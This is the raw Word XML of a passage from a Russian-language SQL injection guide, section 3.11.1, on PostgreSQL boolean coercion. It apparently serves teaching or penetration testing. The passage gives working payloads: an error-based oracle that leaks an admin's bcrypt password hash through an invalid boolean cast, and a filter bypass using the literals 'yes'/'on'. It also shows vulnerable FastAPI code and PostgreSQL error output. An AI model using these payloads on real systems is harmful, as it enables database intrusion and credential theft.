          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для 3.11.2.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XML Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для 3.11.3.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Arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Array Operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для 3.11.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.1 Boolean coercion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.11.0.</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PostgreSQL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принимает в качестве text-input один из 10+ литералов (case-insensitive):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'yes'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'on'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для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'false'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'no'</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 для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Implicit cast text→boolean происходит автоматически в WHERE-comparison против BOOLEAN-колонки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это создаёт три класса уязвимостей:</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Error-based oracle через invalid boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — text, не соответствующий ни одному из bool-литералов, ломает cast с детальной ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type boolean: "&lt;значение&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;значение&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атакующий пробрасывает leak-результат subquery.</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Sanitizer-bypass через широкий namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фильтр, блокирующий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не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'yes'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Атакующий проходит через альтернативную форму.</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Short-circuit confusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE active = '$x' AND id = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ломает cast — ошибка происходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий узнаёт, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">active = '&lt;его-leak&gt;'::boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пытался выполниться — это сам по себе oracle: вызов произошёл при определённых условиях короткозамыкания.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — error-based oracle через invalid boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: WAF блокирует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-cast и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-cast (классические error-based — см. 3.2). Но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неявный — пишется кодом приложения, не приходит из payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый запрос (из 3.11.0):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users WHERE is_active = '&lt;is_active&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is_active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — BOOLEAN. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;is_active&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — что-то, чего не парсится как bool, PG падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type boolean: "&lt;значение&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Значение попадает в текст ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дословно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что превращает его в leak-канал.</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is_active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x' || (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1)</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 FROM users WHERE is_active = 'x' || (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG вычисляет правую часть: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'x' || (subquery)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкатенация. Subquery возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'$2b$12$abc...xyz'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bcrypt hash). Получается строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'x$2b$12$abc...xyz'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которую PG пытается cast в BOOLEAN и падает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR:  invalid input syntax for type boolean: "x$2b$12$abc...xyz"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LINE 1: SELECT * FROM users WHERE is_active = 'x' || (SELECT password_...</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Текст ошибки попадает в HTTP-ответ приложения (через 500 status или через debug-страницу FastAPI) — атакующий читает hash напрямую. Идентично 3.2.x по механике, но через BOOLEAN-cast вместо INT-cast.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Длина leaked-значения ограничена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\d+</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varchar(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-полей (если конкатенация переполнит — PG обрежет). Bcrypt hash (60 символов) укладывается в практически любой error message buffer (PG лимит — 1024 байта в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">varchar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без модификатора; ошибка cast — без лимита, выводит всё).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — sanitizer-bypass через альтернативные bool-литералы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: sanitizer блокирует подстроку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(наивный анти-tautology фильтр), но колонка BOOLEAN допускает 5 других литералов для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def sanitize_inp(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if "true" in value.lower():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        raise HTTPException(400, "no 'true' allowed")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value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в эндпоинте:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">inp = sanitize_inp(request.args["filter"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = text(f"SELECT * FROM users WHERE is_admin = '{inp}'")</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filter</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yes' OR is_admin = 'on</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 FROM users WHERE is_admin = 'yes' OR is_admin = 'on'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG cast-ит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'yes'::boolean → true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'on'::boolean → true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WHERE становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">true OR true = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — возвращает все строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативы для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-замены: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Литерал</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Результат cast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'true'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true (заблокирован sanitizer)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'yes'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'TRUE'</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'YES'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / etc.</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true (case-insensitive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
